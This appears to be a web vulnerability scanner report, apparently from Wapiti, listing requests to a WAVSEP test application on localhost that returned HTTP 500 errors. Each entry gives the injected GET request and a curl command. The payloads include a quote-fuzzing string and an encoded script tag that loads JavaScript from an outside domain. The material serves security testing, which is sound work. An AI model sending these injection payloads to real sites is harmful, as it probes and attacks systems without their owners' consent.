The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2eqrdvi44z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2eqrdvi44z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwefirjsurz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwefirjsurz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp431nws3sz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp431nws3sz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw94k0qzqoyz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw94k0qzqoyz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn7q6wpidwz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn7q6wpidwz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd2l2n3k9yz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd2l2n3k9yz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbiyibewvsz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbiyibewvsz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws3jjo1954z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws3jjo1954z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlr9n1ddyuz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlr9n1ddyuz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa93inz9cfz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa93inz9cfz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwacccx4z7wz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwacccx4z7wz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi989t8kebz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi989t8kebz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgh1h0mjo6z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgh1h0mjo6z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi4q9bd8xzz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi4q9bd8xzz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwh15uqe769z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwh15uqe769z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwf8awo4k0kz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwf8awo4k0kz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjx502qfz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjx502qfz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxw2frnjsbz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxw2frnjsbz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwboyi4qx6fz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwboyi4qx6fz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvjxgg7ygcz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvjxgg7ygcz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9tdun7p5lz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9tdun7p5lz.js%3E%3C%2Fscript%3E"
